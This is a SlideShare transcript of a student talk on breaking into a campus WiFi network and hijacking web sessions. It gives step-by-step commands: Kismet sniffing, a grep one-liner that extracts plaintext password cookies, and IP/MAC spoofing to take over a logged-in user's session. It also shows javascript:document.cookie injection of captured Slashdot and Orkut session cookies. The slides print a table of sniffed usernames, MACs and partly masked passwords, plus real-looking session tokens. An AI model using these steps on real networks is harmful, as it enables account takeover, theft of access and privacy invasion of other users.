Smit WiFi_2

813 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
813
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
5
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Smit WiFi_2

  1. 1. Down the rabbit-hole <ul><ul><li>a sneak peek at the SMIT-WiFi implementation </li></ul></ul><ul><ul><li>Amit Saraff </li></ul></ul><ul><ul><li>Ashish Shekhar </li></ul></ul>
  2. 2. Tools Used <ul><li>Nmap – network scanner </li></ul><ul><li>Wireshark / Ethereal - packet analyzer </li></ul><ul><li>Kismet – wireless sniffer </li></ul><ul><li>BurpSuite – proxy (http header modifier)‏ </li></ul><ul><li>Firefox – web-browser </li></ul><ul><ul><li>Live HTTP Headers </li></ul></ul><ul><ul><li>User Agent Switcher </li></ul></ul><ul><ul><li>Tamper Data </li></ul></ul><ul><ul><li>View Cookie CS </li></ul></ul><ul><ul><li>NoScript </li></ul></ul><ul><li>Unix tools – wget, curl, ssh, ifconfig etc. </li></ul><ul><li>Intel Centrino-based laptop running Slackware 9 </li></ul>
  3. 3. Brief Overview <ul><li>IP Range :- 172.16.183.0/22 </li></ul><ul><li>WEP / WPA – no (yes !!)‏ </li></ul><ul><li>4 different essid's - </li></ul><ul><ul><li>SMITWiFi1 </li></ul></ul><ul><ul><li>SMITWiFi2 </li></ul></ul><ul><ul><li>SMITWiFi3 </li></ul></ul><ul><ul><li>SMITWiFi4 </li></ul></ul><ul><ul><li>different essid's / same channel ?? </li></ul></ul>
  4. 4. Brief Overview (cont..)‏ <ul><li>172.16.183.1 – router / DNS resolver / authenticator </li></ul><ul><li>172.16.183.2 – 802.11b Access Point </li></ul><ul><li>172.16.183.3 – D-link DWL-900 AP+ (standard 802.11bg ap)‏ </li></ul><ul><li>172.16.183.4 – (new) Another access-point ? </li></ul>
  5. 5. Initial Monitoring <ul><li>E-mail accounts </li></ul><ul><ul><li>[email_address] </li></ul></ul><ul><ul><li>[email_address] </li></ul></ul><ul><ul><li>[email_address] </li></ul></ul><ul><ul><li>[email_address] </li></ul></ul><ul><ul><li>[email_address] </li></ul></ul><ul><ul><li>[email_address] </li></ul></ul><ul><ul><li>[email_address] </li></ul></ul><ul><ul><li>[email_address] </li></ul></ul>
  6. 6. Initial Monitoring (cont..)‏ <ul><li>and web addresses </li></ul><ul><ul><li>www.orkut.com </li></ul></ul><ul><ul><li>www.cisco.com </li></ul></ul><ul><ul><li>www.wipro.com </li></ul></ul><ul><ul><li>www.musicgamesrefer.com </li></ul></ul><ul><ul><li>www.grisoft.com </li></ul></ul><ul><ul><li>www.yahoo.com </li></ul></ul><ul><ul><li>And some more orkut !! </li></ul></ul>
  7. 7. But that's not what we are looking for !!
  8. 8. Wall of Sheep IP MAC User Password 172.16.183.15 00:12:f0:db:ef:6f d205a m_-_-i 172.16.183.23 00:12:f0:64:0a:67 g205a b_-_i 172.16.183.78 00:13:ce:7b:d7:9b d108a 1_3 172.16.183.116 00:16:ce:54:69:48 b206a j_-n 172.16.183.117 00:12:f0:56:b7:3f k205a n_-_-_-w 172.16.183.149 00:15:00:22:c4:0f l205a p_-_-_-_4 172.16.183.155 00:13:02:43:2b:0d r305a r_-_-_a 172.16.183.180 00:12:f0:51:3b:e0 j301a h_-_-_-a ** and this is just a small part of the list How about some user account details?
  9. 9. So how did this happen ?
  10. 10. 172.16.183.1 – Authentication Server
  11. 11. Talk about multi-platform support
  12. 12. User – Agent Switcher to the rescue
  13. 13. Background magic – how it really works
  14. 14. How hard is it? <ul><li>Log the network traffic using Kismet </li></ul><ul><li>And run - </li></ul><ul><li>' strings Kismet*.dump|grep Cookie|egrep “_Pass=[a-zA-Z0-9]+;” ' </li></ul><ul><li>to get : </li></ul><ul><li>Cookie: _UserName=m301a; _Pass=123; JSESSIONID=975DCC46FE52BC0A3CEFDA8E568A7293 </li></ul><ul><li>Cookie: _UserName=r703a; _Pass=manisha; JSESSIONID=2914445C961B072A73498FDCC1CEB9AE </li></ul>
  15. 15. But that isn't very ethical <ul><li>Problem – How to get access to the internet without compromising another's account ? </li></ul><ul><li>Solution – Study the entire process and find a work-around. </li></ul>
  16. 16. Brief Introduction to Cookies No not these “cookies”
  17. 17. So what are they ? <ul><li>Parcels of text sent by a server to a web-browser and then sent unchanged back by the browser each time it accesses the server. </li></ul><ul><li>Used for authenticating, tracking and maintaining specific information about users. </li></ul><ul><li>We saw an example 2-3 slides back. </li></ul><ul><ul><li>For those who “missed it” here it is again : </li></ul></ul><ul><li>Cookie:_UserName=m301a;_Pass=123;JSESSIONID=975DCC46FE52BC0A3CEFDA8E5 68A7293 </li></ul>
  18. 18. How do they help? <ul><li>The SMIT server sets a cookie on each client it authenticates. </li></ul><ul><li>Refreshes it every 180 seconds. </li></ul><ul><li>How do I then get this cookie ? </li></ul><ul><li>And how will it help even if I do manage to capture it ? </li></ul>
  19. 19. Step 1 Find active hosts on the network :enter 'Kismet'
  20. 20. Step 1 (cont..)
  21. 21. Step 2 Select an active host and note parameters ie. IP Address and MAC address.
  22. 22. Step 2 (cont..)‏ Change settings locally to match host about to be compromised. For eg : ifconfig eth1 172.16.183.209 hw ether 00:13:02:C1:28:D4 route add default gw 172.16.183.1
  23. 23. Step 3 <ul><li>Fire up your browser – Firefox in our case. </li></ul><ul><li>Type in the following URL : </li></ul><ul><ul><li>http://172.16.183.1/24online/webpages/clientlogin.jsp? </li></ul></ul><ul><ul><li>loginstatus=true&logoutstatus=null& </li></ul></ul><ul><ul><li>message=&liverequesttime=180& </li></ul></ul><ul><ul><li>livemessage=null&url=&isAccessDenied=null& </li></ul></ul><ul><ul><li>fromlogout=null </li></ul></ul><ul><li>This acts as a 'refresh' command to the server which replies back with the validated cookie. </li></ul>
  24. 24. ..to get
  25. 25. ..and we are online
  26. 26. Step 3 (cont..)‏ <ul><li>What this does : </li></ul><ul><ul><li>Sets you up with the “cookie” </li></ul></ul><ul><ul><li>Refreshes itself every 180 seconds </li></ul></ul><ul><ul><li>Voila, you have free internet access (until the guy logs off / you log him off)‏ </li></ul></ul><ul><li>Node goes offline ? </li></ul><ul><ul><li>Rinse and repeat the entire process with another IP. </li></ul></ul>
  27. 27. Return to cookie-land <ul><li>Authentication mechanisms </li></ul><ul><ul><li>We just saw an abuse of the implicit trust mechanism guaranteed by cookies </li></ul></ul><ul><ul><li>But that was local </li></ul></ul><ul><ul><li>Can it be extended to other sites too? </li></ul></ul>
  28. 28. Presenting Slashdot <ul><li>Popular technology portal. </li></ul><ul><li>News site for anything regarding Technology / Linux / Politics / Science / YRO – Your Rights Online and more. </li></ul><ul><li>Uses HTTP-POST mechanism for sending authentication data. </li></ul>
  29. 29. The main page
  30. 30. Login page
  31. 31. Cookie
  32. 32. Exploit - <ul><li>To authenticate as that user simply capture the incoming cookie </li></ul><ul><li>Then in the address-bar type in : </li></ul><ul><li>javascript:document.cookie='user=609178::Ik2zsyez qK6AIER7rLuyD7; Domain=.slashdot.org; Path=/'; </li></ul>
  33. 33. Result ?
  34. 34. So what ? But then that is hardly any sweat !!
  35. 35. Moving on - orkut.com <ul><li>What is orkut ? </li></ul><ul><ul><li>Social networking site. </li></ul></ul><ul><ul><li>Online community to meet new people and keep in touch with old ones. </li></ul></ul><ul><ul><li>Now part of the Google empire. </li></ul></ul><ul><ul><li>On in “atleast” 15 of the 20 or so computers in the campus cyber-cafe at any time of the day. </li></ul></ul>
  36. 36. Main page.
  37. 37. First observations. <ul><li>Note </li></ul><ul><ul><li>The address-bar is yellow and there is a lock-sign on the taskbar. </li></ul></ul><ul><ul><li>What it means : </li></ul></ul><ul><ul><ul><li>Site uses Secure-HTTP (Port 443 / https)‏ </li></ul></ul></ul><ul><ul><ul><li>Certificate for validation (AES-256 bit encryption)‏ </li></ul></ul></ul><ul><ul><ul><li>Trusted certificate issuer – Thawte Consulting cc. </li></ul></ul></ul><ul><ul><li>Actual login frame URL : </li></ul></ul><ul><ul><li>https://www.google.com/accounts/ServiceLoginBox?service=orkut&nui=2&uilel=1&skipvp age=true&msg%3D0%26page%3Dhttp%253A%252F%252Fwww.orkut.com%252F&followup=https%3A%2F%2Fwww.orkut.com%2FGLogin.aspx&hl=en-US </li></ul></ul>
  38. 38. In other words – that information is definitely not being cracked anytime soon .
  39. 39. Cookies, again? <ul><li>Cookie generated on login : </li></ul>
  40. 40. Cookies, again ? (cont..)‏ <ul><li>2 cookies set by the orkut domain </li></ul><ul><ul><li>First one seems to be a user preference cookie </li></ul></ul><ul><ul><li>Second one is for timezone (??)‏ </li></ul></ul>
  41. 41. Cookie (1)‏ <ul><li>Question : Does Cookie 1 alone do the trick then ? </li></ul><ul><li>Solution : Grab another cookie and check. </li></ul>
  42. 42. Back to kismet dumps <ul><li>Hunt for a cookie in the previous gathered logs. </li></ul><ul><li>strings Kismet-*dump|grep Cookie|greporkut -i </li></ul><ul><li>To get : </li></ul><ul><ul><li>Cookie: orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=: </li></ul></ul>
  43. 43. Set this cookie javascript:document.cookie=' orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=:; Domain=.orkut.com; Path=/ ';
  44. 44. To get : Notice self-post!
  45. 45. Future possibilities ? <ul><li>Setup a HTTP server and masquerade as 172.16.183.1 in order to capture logins. </li></ul><ul><li>Attack the hardware itself(vulnerabilities in the server / access-points). </li></ul><ul><li>Ban certain clients from access (arp-flooding). </li></ul><ul><li>Put the laptop in “Master” mode to route traffic through it. </li></ul>
  46. 46. Thank you ___________________ Questions ?

×